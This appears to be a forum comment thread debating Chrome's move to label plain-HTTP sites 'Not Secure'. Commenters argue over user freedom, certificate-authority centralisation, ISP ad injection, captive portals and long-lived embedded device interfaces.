This is just a warning though, no one is preventing you from "going there", it's merely a warning that it might not be safe. Your analogy is more similar to "there's a slow down on that road, let me navigate you somewhere else, but feel free to go there if you want". You have exactly the same amount of freedom.
How exactly is using HTTPS "gain control over the masses"? Google does not control the HTTPS infrastructure.
It's not like those sites are gone either. There's always archive.org.
The irony of (mis)quoting "Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety" in the same breath as saying "And I have JS off by default" is definitely worth pointing out here
Indeed. I, the user, get to choose whether to allow JS or not.
Now consider that things like Meltdown and Spectre have JavaScript PoCs
If this was instead 'Chrome 68 will mark all JS-using sites as "not secure"', I wouldn't want that warning either, but then I'd be in agreement with the majority...
Right back at you. How is buying an iPhone over an Android giving up essential liberty? I always have the right to sell it, go to the store, and buy a device that lets me do whatever I want.
Except browsers today are continuously developed, often with larger strategies in mind. Google has stated very openly that their ideal state is a world where there is no insecure HTTP at all and they intend to move everything as close as possible to that state. To reach this, the browser behavior is slowly tightened over a long number of releases.
So a better analogy would be a carmaker announcing that they don't want people to drive to unsafe areas. They'll monitor people's driving behavior via telemetry and OTA-update the car's software accordingly to nudge people's behavior closer to that goal.
So the warning would probably be the first step. Driving to unsafe areas will still be technically possible but it will become progressively more cumbersome until you just give up.
I think that imposing decisions on others for their own good is a dangerous path to take. You stop considering them as adults capable of taking rational decisions but as children that need ot be shown the light, by employing authority and force if necessary. The enlightened technological elite thinks that HTTPS is better so they have decided to impose that decision on everyone else.
It should always be a choice. If something is insecure, show a warning, in big red bold letters if you have to, but allow the freedom of choice to the end-user. But here, what do we have ? Many newer Javascript, HTML or HTTP features are restricted to HTTPS. Even things like Brotli stream compression which bear no security implications. This is done only to coerce people to use HTTPS.
Flash was a proprietary non-mobile-friendly technology from the start until its demise at the hands of its creators. No heavy-handed dictatorship, just bad products dying, and products that unfortunately depended on them died along with them.
I think your last statement highlights the real issue here. Everyone is afraid of malicious javascript. I don't know why they're conflating that with http injection.
The most straightforward thing to do would be to disable javascript on non https sites by default or warn if a nonhttps site has javascript. Most of the old sites we want to keep around don't have javascript in them (or much javascript in them).
Ideally people should only be enabling javascript on sites they trust (and are running https for "real" "trust") but having a trusted whitelist for enabling javascript brings back your big brother arguments.
It's not just javascript though, we've seen ISP (or other malicious actors in the network) inject ads, of even place the entire HTML content of the site into an iframe.
This is a malware injection problem and it should be possible for google to create signatures of JavaScript from different websites and have chrome verify it and block it.
Penalizing all http users is heavy handed and google should not go down that path.
When a highway is plagued by bandits, the govt must go after the bandits and put them away, not close the highway or turn into a cramped tunnel made of armoured steel with only one narrow lane.
I'm saying that instead of doing away with plain-text protocols, maybe national govts can each regulate their ISPs to stop injecting content into the bits they transmit? That would go a long way towards increase of privacy. As for bad state (sponsored) actors, I doubt https can really stop them doing what they want, especially not the big ones.
> maybe national govts can each regulate their ISPs to stop injecting content into the bits they transmit?
Good one. Next you'll be telling me that those very same companies don't spend billions on getting the laws written the way they want.
Sure you could try the top down approach where everyone has the best intentions but that's not going to happen, in the meantime I'm installing bulletproof windows in my car.
Some Javascript, HTML or HTTP features are available on HTTPS only. Even things like Brotli stream compression which have no security implications. So some liberty is definitely taken from users who wish to use insecure connections for whatever reason.
> I think it can be summed up in one old but very relevant-in-our-times quote: "Those who give up freedom for security deserve neither."
Now if you could explain to me how using secure connections and showing a correct warning for insecure connections is restricting your freedom that'd be interesting.
My ISP offers security certificates for $145 more than I currently pay per year. The result is that I'll have to pay up, or face a drop off in traffic for my sites from people who will be too scared to view them because of this new browser-based warning... My sites are all public information, no secure data is displayed on them, and there are no user accounts beyond those of my team's editing accounts. It would be sort of overkill to require HTTPS on them.
Cloud hosting is much more expensive than my current hosting plan. It seems like this is also highly convenient for ISPs that http will be phased out because either way, ISPs make a lot more money out of web site business by the newly required standard.
This is the future we knew was coming, where it becomes so expensive for individuals to do the same as companies do. It's how Radio, TV, and many other things were taken away over the years, it simply became too much of a legal hurdle and way too expensive to run until large companies became the only channel owners.
It's just history repeating itself, but now to shut out individual web site and application makers who don't have resources to compete with big business. :\
> Now consider that things like Meltdown and Spectre have JavaScript PoCs. How is this controversial?
Please explain to me how Javascript delivered from a malicious ad delivered over HTTPS is somehow safer. Most malicious code is delivered with the help of the website.
I would have nothing against it, if browsers just disabled Javascript on plain-HTTP web sites. I do it anyway by default, enabling it on domains where it serves some useful purpose. Treating non-HTTP content as untrusted makes absolutely sense (though I don't think that HTTPS really makes a https://random.l33t.site/ a trusted source of anything).
The old simple plain-HTTP plain-HTML web is still useful and practical for showing text (don't care much even about CSS - HTML 3.2 is perfectly suitable for showing readable information). It seems to become a victim of collateral damage in the pursuit of "better web", which is sad.
My only concern is that the end user can always control which Certificate Authorities his/her browser accepts, and that anyone can set up their own CA. It seems like both of these conditions are vital for the future of decentralized web.
People who cheer for tons of stupid fucking HTTP warnings all over the place really bug me to be honest. Anyone who uses the web needs to be taught the difference between a secure and insecure connection and told where to look for signs (this assumes we burn stupid shit browsers that look to mangle URL bar by removing data from it).
The grandma will not make better decision if you put in another dumb warning like this one https://i.imgur.com/rxmyWtF.png to waste more and more of my time when I enter my password on the same website over and over. I KNOW IT'S INSECURE, JUST STFU already.
I'm at the point where I will look to build my browsers from source after removing that shit (along with removing inability to add certificate exceptions for certain situations). Good thing they're open source.
I don't get how so many people miss the point here, but alas.
It's actually not so complicated: obviously, there's nothing actionable for the user to do here. The message is for the user, but only indirectly: it's there to push developers into better practices. Your boss may not care about encryption or privacy, but definitely will care about hundreds of phone calls asking why they are warned that the form is insecure when they try to login.
With plenty of obscure pages accepting everything from passwords to credit card numbers on plain HTTP pages, this is important. There may not be someone browsing the page knowledgeable enough to catch this, but if any end user can know what they're doing is wrong, then it's much more likely it will be discovered.
While mostly not actionable directly for users, one thing a user can, and probably should, do is close the page, if they can.
It's actually not so complicated: obviously, there's nothing actionable for the user to do here. The message is for the user, but only indirectly: it's there to push developers into better practices
So it's the online equivalent of plastering Warning: Contains chemicals known to the state of California to cause cancer all over everything from gas pumps to gerbils.
Even if cancer rates were more or less completely uncorrelated to the presence and/or usage of those products? Congratulations, you've raised the social noise floor for no good reason.
Except it works. If it makes you mad, imagine how many other people it makes angry. And aside from recompiling your browser, all you can do is fix the problem and make the browsers happy.
This is the issue with all systems that use human-friendly naming because someone is in the authority to do the name resolution. This battle was lost when DNS came along.
Not everybody wants to use public keys to refer to everything - even if it is via QR codes.
> this assumes we burn stupid shit browsers that look to mangle URL bar by removing data from it
That's just about every browser now. I think that full URLs are only available in Firefox, and only if you set `browser.urlbar.trimURLs` to `false` in about:config. Hiding URL information is a very bad trend.
As it is demonstrated now, the indicators work to show the http part of the URL in a way that relates some of its subtext much better to average users. Now, if it were to stay that way, I would be fine with it. But if past performance is any indicator here, this will be just the first step on that silly warnings spiral. If browser vendors aren't careful, they'll flood users with too many warnings, which makes them ignore them entirely.
But they are being careful. This rollout has been taking place slowly over the last two years, and continues to do so.
Changes are incremental to give developers a chance to adapt, and to prevent users from getting used to warnings.
HTTP/2 requires https. New APIs have started requiring https. And only forms with passwords or CC inputs will trigger security warnings. These are incremental steps.
I don't know why people think browser vendors haven't considered this stuff before.
Eventually vendors will start deprecating existing APIs to continue the migration towards requiring https. That will put more heat on developers, but only after they've ignored warnings for literal years.
But even the change announced today is only a UI update to the omnibar. It's hardly earth shattering.
Browser vendors are clearly not careful enough. Requiring SSL brings with it a kind of baggage that is ill-suited for tons of use cases. Do not simply assume that all developers ignored these signs out of laziness. They might instead be unable to comply in a useful fashion.
HTTP worked unchanged for close to 3 decades. People started to rely on that. Now they are trying apply crowbars to force that out. This is myopic.
Safari is the worst by default. I don't have any Apple devices, but when I look at screenshots of Safari's URLs, they are not full URLs. Also, it looks like you can't show the full URLs on iPads or iPhones. (You can on Firefox for Android.)
Not a full URL: example.com
Not the full URL: http://example.com (the page will load after completing the URL with a trailing slash)
If this is just a warning, that's one thing. If it becomes a solid block, it means more hassle for everyone running an intranet, and a huge liability for millions of long-lived devices with embedded web servers for browser-based configuration.
Actually, I want a way to turn off the warning on my intranet because of all those printers, sensors, and control units on my intranet that are not going to get upgraded. I don't think I can find an HVAC or sensors with https, and I doubt anyone will authorize a 10's of thousand dollar replacement. I do not want a call anytime people have to deal with these devices and get a scary warning. Telling them to ignore it is not going to generate the right attitude when they go on the internet.
An inappropriate warning is still counterproductive, I agree, but it's in a different league to a solid block.
Not so long ago, I was dealing with the browsers vs. Java applets war, which had a similar effect on many devices as they became progressively harder and ultimately impossible to use. The attitude demonstrated by many defending those browser changes -- as if completely and permanently breaking useful, long-developed, working software on a private network was somehow a good thing -- was somewhere between smug, dismissive and arrogant, and actually quite offensive in some cases.
Developers often wonder why people use iSeries (AS/400) machines. Well, the software is long lived and keeps working. The whole IoT is not going to go forward when the software infrastructure is sand as opposed to stone. I get the feeling if this stuff keeps up, it would be wise for some infrastructure company (e.g. Honeywell) to sponsor an OS specifically for infrastructure with some version of a remote desktop to talk to it. Obviously, web browsers are the wrong way to control long lived devices.
The whole IoT is not going to go forward when the software infrastructure is sand as opposed to stone.
I agree with you about longevity, though I think IoT is mostly a solution in search of a problem anyway, even if the hype train is clearly going to run for a long time yet. Connectivity is obviously useful for some devices, but most of the products I have ever seen in the IoT space weren't IoT to benefit the user, they were IoT to benefit the developer, and they often made the user's experience worse. The other day I visited a friend, and he couldn't change the settings for the lights in his home because his Internet connection was playing up!
Obviously, web browsers are the wrong way to control long lived devices.
There, I will respectfully disagree. Web browsers are, or at least were, a useful way to access devices over well-defined and standardised protocols that were supported on many client devices. They allow UIs much more user-friendly than a command line for non-technical users, and they don't depend on native applications for each client or customised control protocols for each product.
I've built many browser-based UIs for clients over the years with good results, and the only thing that has ever seriously broken them was when browsers started dropping support for useful, long-established functionality -- hence my concern in the current case.
There, I will respectfully disagree. Web browsers are, or at least were, a useful way to access devices over well-defined and standardised protocols that were supported on many client devices.
I think its the "were" part that getting me. We had a standardized protocol: http which is now being phased out and a whole lot of developers of embedded systems jumped on it as a control mechanism for their devices. Now we have this crowd of other developers that focus on a different market segment and don't really give a damn about the problems that causes for others. "Move fast and break things" is fine for startups, but not for anything that our profession built into things. I just a little sick of a disposable culture. I agree https is a great thing and needed, but putting scary warnings on http that cannot be mitigated is a pain in the butt because at some point they will remove http entirely.
At this point, I honestly wish the embedded device programmers would jump off the web train and move on to something else.
At this point, I honestly wish the embedded device programmers would jump off the web train and move on to something else.
OK, but what? That's the real question here, surely.
There are very few developments in the history of computing that have been as widely useful and long-lasting as the fundamental web technologies. The fact that certain browser developers are now trying to embrace, extend and extinguish those technologies for their own obvious purposes and without regard to collateral damage just means we need to push back hard against those browser developers. Google is already more powerful than is safe for our industry, and certainly we must not let it become the de facto owner of anything essential.
There are very few developments in the history of computing that have been as widely useful and long-lasting as the fundamental web technologies.
I'm not so sure. All of the web technologies have changed over time. I'm pretty sure only the simplest web pages from the 90's are still functional. Their are still computers sold today that can run IBM/360 programs unchanged.
The fact that certain browser developers are now trying to embrace, extend and extinguish those technologies for their own obvious purposes and without regard to collateral damage just means we need to push back hard against those browser developers.
Well, I still think the idea of using a document format as an application format was totally foolish. Frankly, something like a decedent of QML or even Sun NeWS would have been more appropriate. Heck even a networked p-machine with a UI would have been better. A frozen subset of HTML might work (well, could use WML and WMLscript since nobody uses that anymore). I think the whole push back is not going to happen. Instead we end up with a harder development environment than Visual Basic or NeXTSTEP with less functionality than either.
Google is already more powerful than is safe for our industry, and certainly we must not let it become the de facto owner of anything essential.
No disagreement there. They own the web and can declare your site removed from the internet as far as 90% of web users are concerned.
One might understand an extra-hostile stance against Java applets, having witnessed tortured attempts to keep a vendor's applet running when that applet required a very, very specific (and even then very obsolete) version of Java 1.3 incompatible with some other awful software's requirements. Breaking other, innocent software would have seemed like a pretty fantastic deal, in order to reduce future applet pain.
That was my life a few years ago when Java applets switched from being the best thing since sliced bread to being anathema. Or take ActiveX for another example. Trying to do business with consumer-grade browsers is just one pain point after another.
It’s really an issue, and why am I setting up another server app to fix something that should be a switch for the administrator in software that worked before?
The fact that people want to force HTTPS really bugs me. HTTPS centralizes the publication rights to browser vendors and cert vendors. Why should you require permission before publishing content on the web? IMHO, They should rename the S in HTTPS to $.
I believe that Google's intentions here are to block other pass-through internet entities from collecting advertising data. Obviously, Google would never encrypt user data so that they couldn't mine it. Personally, I am more worried about Google mining our data than some rinky dink ISP.
Also, could you link to the PoCs? I have not seen a reliable PoC but maybe I haven't look that hard. The ones I've seen only work on specific CPUs, and only if certain preconditions are met. But anyway, that is a separate discussion.
Why is it absurd? So I either have to pay a CA vendor, or I have to ask Lets Encrypt permission to renew my cert every 90 days.
In any case, why should I be forced to support a model where I have to beg for permission to host anything. I believe in stating my opinions and let others make up their own mind. The opposition believes in forcing everyone to adopt their position by fiat. Why not put the information out there, and let people switch to HTTPS if they feel like the benfits make sense to them.
And that's why chrome will mark your site as insecure.
> why should I be forced to [..] beg for permission [..]
That seems to be the best thing humans came up with so far, if you want nice stuff that requires coordination. You also have to "beg" for a connection & ip address. You also have to "beg" for a DNS name. Please propose something better (that doesn't come with its own significant drawbacks).
>And that's why chrome will mark your site as insecure.
That is a false statement. Using 'what could happen' logic, Windows should label Chrome/Firefox/IE as insecure/malware since someone could theoretically do bad things with those tools.
>Please propose something better (that doesn't come with its own significant drawbacks).
Why don't you start first? Since this HTTPS so-called 'solution' has its own significant drawbacks.
You aren't forced to do anything. If you choose to use HTTP, you can, and no one will stop you. The Chrome omnibox will accurately report to users that your site is insecure, if you do, but that's just making them aware of a basic fact.
>The Chrome omnibox will accurately report to users that your site is insecure
What evidence does Chrome have that my site is insecure or poses a threat to users?
'What could happen' logic would mean disabling all browsers since you could get pwned by using any of them. That is not a rational way to approach anything.
> What evidence does Chrome have that my site is insecure
The fact that it is using HTTP, and therefore can be trivially MITMed by anyone controlling any point traversed between you and the client. Communication between the browser and your server is insecure.
Whether that is an important fact to users is a decision users will need to make, but it is a fact.
> 'What could happen' logic would mean disabling all browsers since you could get pwned by using any of them.
Clearly, to the extent that is accurate, that's not the logic at issue since nothing is being disabled here. So, please, stop with the irrelevant strawmen.
>The fact that it is using HTTP, and therefore can be trivially MITMed by anyone controlling any point traversed between you and the client.
Can you please link to any evidence showing the millions of HTTP sites that were MITMed? I mean after all its so trivial as you claim. OTOH, why would anyone care to do that when they've found it much easier to trivially inject scripts and other potentially harmful stuff via compromised ads, third party hosted JS scripts, compromised CDNs, etc, etc. The current proposal fails to address any of those real, actual, tangible 'bad' things that are actually occuring with alarming frequency.
>Communication between the browser and your server is insecure.
That applies to every single piece of data transfered that is not under the control of the domain being visited.
>Clearly, to the extent that is accurate, that's not the logic at issue since nothing is being disabled here. So, please, stop with the irrelevant strawmen.
Simply asserting it doesn't make it so. I reject your interpretation. The most dominant browser vendor showing scrary yellow triangles with exclamation marks, instead of showing your webpage is exactly like disabling it.
> The most dominant browser vendor showing scrary yellow triangles with exclamation marks, instead of showing your webpage is exactly like disabling it.
No, it'd not, and we know it's not because the much more forceful click-through warnings they used for HTTPS certificate errors (because scary red icons in the address bar failed) still had a high enough click-through rate when the “proceed” link wasn't hidden behind a multi-click process hidden behind an “advanced” button that, well, they invented the multistep, hidden process they use now for certificate errors.
And, anyway, the UI they've shown is simple light grey “Not Secure” text, not a “scary yellow triangle”. It's not anything like blocking, and it's not a blocking attempt that failed because—frommthr experience with certificate errors—they know how much it takes to really stop casual web users from proceeding in the face of a security warning.
It's absurd because you're describing it as some sort of money shakedown when 1) Google isn't profiting off of this and 2) you can get certificates for free.
The complaint is not about the cost of the certificate, it's about handing the control to availability to someone else.
What you are describing is how things are working for now.
First, there's now guarantee Let's Encrypt will be here tomorrow. You're pinning the future of the Internet onto the shoulders of maybe a dozen people who run it.
Second, CA's are - by definition - centralized. There's no guarantee that, in principle, you'll always be able to get a certificate for them.
The Internet was designed to be distributed and hard to break. HTTPS-only Internet is going backwards on this.
I'm all for security and privacy, but any solution that requires a centralized third-party for the whole system to function is, in my opinion, broken by design.
There's that, and there's making the system needlessly complicated for many tasks. There are very, very many websites and users (I'd say - the absolute majority) who are OK with the Dangers Of HTTP (that is, some intermediate party being aware that you read a certain webpage). Worrying about that in the age where every step is tracked, every face detected, and every page is full of trackers seems, to me, facetious.
I browse a popular gaming forum that has not implemented HTTPS. Chatting with the admin, the reason is simple: Ads.
We can definitely blame the ad networks. Some have switched, but many won't work on https, and websites relying on ad revenue must stay with HTTP or make less money with HTTPS-friendly ad networks.
This hasn’t been true for at least a year. There is zero difference in ad revenue for HTTP vs HTTPS now. Join any major online community for publishers and ask anyone if you don’t believe me.
>Now consider that things like Meltdown and Spectre have JavaScript PoCs. How is this controversial?
Seems totally irrelevant, since any "legit" site with a $10 certificate will still be able to inject malicious code, either by its operators putting it there directly, or by it being hacked -- whether there's a man in the middle or not. And with something like Spectre out there, https wont do anything.
> However, you have to recognize the fact that you run JITed code from these sites.
I guess browsers could then make an effort to help sites use scripts only when absolutely necessary and give users easy to use tools to disable scripting. But, oh wait, they do the exact opposite.
Or the users could switch to browsers that disable Javascript, third-party cookies by default instead of the ones controlled by advertising and DRM monopolies. But, oh wait, they do the exact opposite.
You don't need HTTPS to verify integrity. HTTPS actually adds attack vectors, complexity, and removes useful functionality like proxies. And like another commenter mentioned, most malware is delivered from an authentic site anyway.
HTTPS evangelists are basically playing a game of political ideology shrouded as concern for safety. I think they care more about their own privacy than they do the functionality, security, and maintenance required for HTTPS sites.
It's also not coincidental that Google has a vested interest in keeping all traffic surrounding their services hidden or obfuscated: traffic content and metadata is money. Google is basically eating the lunch money of ISPs' passive ad revenue. (This is also part of why they want to serve DNS over HTTPS)
How else would you practically verify integrity for web browsing?
What's wrong about caring about your privacy?!
Why the hell do ISPs deserve ad revenue? I don't like Google either, but ISPs that want to tamper with connections to inject their ads can fuck off and die in a fire. That is more unethical than anything Google has ever done.
> How else would you practically verify integrity for web browsing?
Download a signature once, verify any file before rendering it. You could even control this behavior using an HTTP header if you wanted granular control. It would be a trivial extension.
Today, nobody verifies that content was created by the author. That content can be subverted on the web server, and this is how malware is distributed today. Verifying content with a signature would actually be more secure than just TLS.
> What's wrong about caring about your privacy?!
Ignoring all the other concerns for the sake of it, is what's wrong.
> ISPs that want to tamper with connections to inject their ads can fuck off and die in a fire. That is more unethical than anything Google has ever done.
Google reads your e-mails and search history and tracks where you go on the internet, and sells the information to advertisers, who then display the ads no matter where you are or what you're looking at - including over HTTPS pages.
That functionality doesn't exist today, so it would be a new protocol. One that would be almost as complicated as HTTPS, would be starting from zero as opposed to the 50% usage of HTTPS on the internet, would require new code to be written which hasn't been thoroughly tested for security issues and would provide inferior assurance to HTTPS. All for the sake of being "simpler."
With regards to signing content, this already exists in the form of code signing. Given the amount of software that isn't signed I doubt it would be practical for anything else e.g. blog posts.
The imaginary user cited does not need that code in order to "browse memes".
The code is there for advertising, e.g., to attract advertisers as customers by gathering data about users.
Hence the push to HTTPS is for companies that aim to generate revenue from selling access to or information about users to advertisers.
I have no problem with HTTPS on the public web, to the extent that it is the concept of encrypted html pages, and perhaps these are authenticated pages (PGP-signed was an early suggestion).
Encrypt a page of information (file), sign it with a public key and then send it over the wire . The wire (network) does not necessarily need to be secure.
However I do have a problem with SSL/TLS.
I would like to leave open the option to not use it in favor of alternative encryption schemes that may exist now or in the future. It seems one allegedly "user-focused" company wants to remove this option. Comply with their choice or be penalized.
The issue I have with TLS is only to the extent TLS is the idea of setting up a "secure channel" to some "authenticated" endpoint (cf. page), with this authentication process firmly under the control of commercial third parties, using an overly complex protocol suite and partial implementation that is continually evolving (moving target) while people scramble to try to fix every flaw that arises out of this complexity.
To the extent it is not what I describe, I have no issue. (That is, I'm pro-TLS.)
We have one company aiming to replace HTTP with their own HTTP/2 protocol, which to no surprise has features that benefit web app developers and the advertisers they seek to attract far more than they benefit users.
Could we design a scheme to encrypt users web usage that would not benefit advertisers? I think yes. But this is not what is being developed. Encryption today is closely coupled with the "ad-supported web". If we are not careful, this sort of policy pushing by Google could cripple the non-ad-supported web that existed before the company was incorporated.
Encrypted "channels" are not the only way to protect information transferred via the web. TLS is not the only game in town.
The only use I know for captive portals is EULAs, and I'm not sure those ever had legal weight (though obviously IANAL).
But honestly they were starting to be outdated (technologically) even before this. Since a lot of popular sites use HTTPS, I usually have to try and think of a non-HTTP site before I can get through. They're just a nuisance at this point.
This is not to defend Google's actions as "altruistic" in any way. But sometimes Google's interests and the public's do align.
What? You use them to log in with some criteria more than just a username/password. For example CableWifi hotspots that let you log in with TWC, Optimum, or others.
Wifi has supported that kind of login for ages (15 years?) at the protocol level, without fucking with the traffic in a MITM fashion. OS support was there already for XP and iOS 2.0.
Every hotel room in which I've stayed has a placard on the table with the BSSID name, userID and password for the portal login.
It would be identical with 802.1X. The only difference in the UI flow is that the authentication prompt is generated by the OS, not on some HTTP page that I only remember about when I wonder why my VPN isn't coming-up.
> log in with some criteria more than just a username/password
The problem there is that captive portals don't add any extra link-layer security. The network is open, so literally anyone can sniff packets.
It's uncommon, but a network using WPA2-Enterprise and user/pass uses different keys for each person (not sure if per device or per user), so you don't have to trust everyone in the room.
Now you don’t have to trust the other customers, only the bar you’re at, their ISP and a million other parties between you and the site you’re visiting.
That's a reasonable point, but I'm speaking from the perspective of the bar owner - I feel I have a duty to provide better security even if the patrons have no reason to trust me.
Like a bar is going to run account administration.. at most they’re going to set a proper password with WPA2-PSK which provides protection against outsiders. But it can’t provide protection against an active attacker that has the password.
Using WPA-Enterprise, as I understand it, requires devices to be preconfigured to authenticate with the radius server, which makes it a non-starter for the kinds of networks that use a captive portal.
No, there's no preconfiguration needed, it's just a username/password account. You choose the network, then the OS asks you for your user/pass, then you're connected.
It's the router that connects to the RADIUS server, not the device directly. And some routers have one embedded, so you don't even need to configure that, it "just works".
Wouldn't it be nice if there was an encryption mode for Wifi that ensures integrity without requiring authentication? At CCC events, the workaround is to have a WPA2-Enterprise network that accepts every username/password combination, but that's going to be hard to explain to non-technical users.
Companies can easily adapt by changing your username to the form of an email (e.g. "jsmith@optimum.net"). Many of those already offer email addresses anyway.
Then your country will look like Germany did until a few years ago, with no WiFi hotspots anywhere, not even in Starbucks, and people being careful not to open their WiFi to guests at a party even.
That's what has happened before, that's what's just going to happen again. In Germany, the owner of a WiFi hotspot was liable for anything users on the WiFi did, unless the owner could prove that every user had signed an agreement that they would not do illegal stuff
If it's unauthenticated, the portal doesn't give you any advantage beyond showing a message.
If it's authenticated, you should be using WPA-Enterprise anyway, which supports different logins, and actually isolates the traffic between clients, whereas those "portals" don't, allowing any other user to sniff your traffic.
Portal shows a message like "here's your temporary login/password for 4 hours". Then a user enters them to the login form. When using WPA-Enterprise, a user can also set up WPA on their device with these credentials.
When macOS connects to a Wi-Fi network it makes an HTTP connection to captive.apple.com, and if it doesn't get the expected page in response it pops up a little browser window. I much prefer this solutions to hijacking page loads in my browser (which tends to have lots of annoying side effects).
If you have to use an internet provider that does not provide reasonably direct access to the internet, you should tunnel your traffic through the service that does (e.g. a VPN).
The idea that all internet sites have to compensate for the low quality of the last mile of some users simply does not make sense. If a site accepts sensitive input from the users than sure, it needs an authenticated and encrypted connection; but if it serves static content, it may hold the internet infrastructure and the receivers responsible for the correct delivery.
I would have trouble following security advice from a company that was serving mining ads directly from its websites last week.
Main argument in favor of http would be it's making browser fingerprinting harder from a privacy standpoint. Https by itself let the server identifies its clients individualy without cookies.
As for reasons, there are tons of folks with personal websites on providers that only offer expensive yearly certificate options. Most CDN providers don't support LetsEncrypt. Most shared hosts don't. The Cloud Sites platform for multi-site shared hosting (formerly RackSpace, now at Liquid Web) that I use for a dozen of my friend's sites I host for free doesn't. So, essentially, this means that personal hosted websites either stay 'not secure', get ditched, or increase in price quite a lot. Yes, it's just 5 to 10 bucks a month to spin up another instance on Digital Ocean, but it's yet another 'server' to manage when I'd rather decrease the number than increase it.
My only issue is HTTP/2 client and servers only implementing TLS. This makes it unnecessarily hard to reverse-proxy HTTP/2 on a loopback connection where it's reasonable to assume being safe from MITM.
The existence of vulnerabilities doesn’t negate the bullshit security theatre of certificate authorities.
Banning http is a great example of tossing the baby with the bathwater.
Https is better, but there are still valuable use cases for unencrypted web traffic.
I am sorry this bugs you, but please note that your straw man is not the argument I’d make. Sometimes you need a low hassle web server. Renewing let’s encrypt certs is not low hassle.
> The existence of vulnerabilities doesn’t negate the bullshit security theatre of certificate authorities.
I agree that the current CA system has flaws, but there are efforts such as Certificate Transparency[1] and DANE[2] attempting to improve or bypass the CA system. That said, just having encryption defeats passive eavesdropping, and even the current CA system of authentication raises the bar for active eavesdropping.
> Banning http is a great example of tossing the baby with the bathwater.
I'm not sure what you mean by that.
> Https is better, but there are still valuable use cases for unencrypted web traffic.
Let's take it as given that HTTP is the right answer in that situation; I'm not saying it is or isn't, but let's assume it is. We're talking about HTTP(S) in web browsers and client-side applications; no one is actually talking about _banning_ HTTP, e.g. blocking port 80 or filtering via deep packet inspection. If you have a use case where after careful thought you decide that HTTP is better than HTTPS, then fine. But HTTPS should be the default.
For web sites and web browsers, sure. But if you want to use HTTP for your BIOS updates (dozzie's example), then go ahead; I don't think anyone is seriously proposing to stop you. Just please make sure that it's done securely. Anyway, TLS is not enough for secure updates.
To be clear the ONLY reason this is happening is to make sure that any ad served from Google is not tampered with. This is protection for their money making machine. Plain and simple.
The attack surface of browsers is relatively small if you keep them up to date. Browsers were early in including meltdown and spectre.
Running JavaScript is pretty harmless.
On the other hand https makes the web performance horrible
As long as this is just a non-obnoxious warning that translates http to something in plain English I can sort of live with it. But as soon as browsers start to inject security warnings, this is going to be very, very bad.
Our company manufactures devices for use in labs and industrial processes. They need complex user interfaces and there is a push to move to HTTP, HTML and JS to implement them with the device as the web server. The devices are usually installed in a controlled, isolated internal networks.
Our clients run these devices for a long time. 20 or 30 years are not unheard of. They also do not update them if there is no malfunction (they work and our clients love it that way).
Now how the hell do we create a webserver that will work reliably for the next 30 years if we have to embed SSL certificates with built-in expiration dates in the range of 1 to 3 years?
how the hell do we create a webserver that will work reliably for the next 30 years if we have to embed SSL certificates with built-in expiration dates in the range of 1 to 3 years
If there's a requirement that your code needs to run for 30 years without an update then current web technology is probably the wrong choice.
A common use case is a device serving a status report as a single simple, static, read-only (i.e. the backend has no intended ability to receive data) html file with limited or no markup. This can reasonably be expected to run for 30 years without an update - there's nothing to update, you have a fixed hardware system showing the same type of numbers to the user until it dies.
Serving this over http in a secure network would be reasonable.
Serving this over https would be reasonable if you can embed a certificate with an appropriate lifetime. Which you can't.
30 years ago browsers didn't exist, so the assumption that in 30 years time they're still going to be compatible with today's servers seems wrong to me. The equivalent would be that you were building this device in 1987 and you embedded a Gopher server on it. It'd still be accessible today but users wouldn't be very happy about how they access it.
As another user said, you own both sides of this problem so write your own client software.
If I write my own client software, that's far less likely to be the case. Writing your own is exactly the thing that you should avoid if long-term compatibility is important, sticking to open standards is a much better way to do that.
Using your own example illustrates it perfectly: if I had a 30 year old device running a Gopher server, that would be usable and I would easily be able to get a client running on a modern computer/OS - but if it needed 30 year old custom client software, then porting it would likely be a quite nasty project.
That example you linked uses absolutely NO CSS or JS! Which yes, is fine and in theory it should work "forever", but any extra functionality and you can't be sure.
Open standards change, software changes and things move on. If you are seriously relying on anything technological working for a decade or more you're out your mind.
You need to keep up and adapt because nobody gives a crap about you or your use case. Here we see Google doing what it thinks best and you need to live with this.
Of course it doesn't use CSS and JS, none of those existed back in 1992 when the website was made.
However, content using CSS1 and javascript 1.0 standards (1996?) should also work in modern browsers; but I couldn't easily find any sites that actually use them and haven't been updated for the last 20+ years to test it; the sites from e.g. 1997-1999 seem to avoid it like the plague since back then you couldn't rely on CSS1 and javascript 1.0 being properly supported.
So yes, just as modern browsers support all web technologies since their very start - a CSS3 compliant browser should be compatible also with CSS2 and CSS1 (20+years old), I'm quite convinced that 20 years into future when we might have CSS 5 or 6, the current CSS3 content will also work as well. New javascript doesn't work on ancient browsers, but ancient javascript works well in modern browsers, that's a core design principle of the web standards - we build them for compatibility.
> The equivalent would be that you were building this device in 1987 and you embedded a Gopher server on it. It'd still be accessible today but users wouldn't be very happy about how they access it.
By using firefox 56? I'm not seeing the issue.
> As another user said, you own both sides of this problem so write your own client software.
Running 30 year old DOS software is a lot more painful than accessing a Gopher server. Is that really the comparison you want to make?
Sadly it's more of a 'wrong' requirement from the customer. Today's entreprise customers expect things to Just Work. They say 'just sell us a goddam appliance, we'll point a browser at it and we'll call it a day!'. I'm quoting real customers' documents here: 'it's should be as easy as Apple'. We've done it to ourselves.
I expect things to just work and I expect them to work for a reasonable lifespan. I often think that a piece of software ought to live as long as a car, and for something commercially created (e.g. costs as much as a house) then it ought to last at least a generation (30years).
I don't think I'm being unreasonable here. In a closed system this should be doable.
edit: one of the reasons I think this is because we are supposed to be engineers, and other engineering disciplines do it (and their disciplines involve computes too). Consider jets and boats.
Jets, boats, and cars all require regular servicing. Parts need fixing and updating and it isn't one and done. The allegory isn't exactly the same as software updates but the allegory of software systems to cars isn't exact either.
I get what you say. But are you, let's say, a Catia ISO programmer who has been thrown as a leader of a project team which purpose is to buy some piece of a tier software/project that will automagically cut your programming time by half?
He may be an engineer, whatever that means, but still: the average joe in that position will not spend a single second on thinking if he expects the solution he's buying to work for a reasonable lifespan. He's been thrown in a project, that's all. If you force him to state a requirement on the expected lifespan, he will surely say 'Well, as long as possible seems good to me'.
Disclaimer: statistics applies here, of course some people will care, but I'm speaking about the 80%, if not more.
Until there is tangible motivation (i.e. multiple players get publicly put out of business by lax security), customers will continue to refuse to understand things they cannot put their hands on.
But I recently had to watch from the sidelines as our management decided against .Net and Qt as the future stack for user interfaces. In the case of Qt the arguments were clearly misinformed, but I only got to comment on that after the fact. So now we will have to deal with web stacks by decree.
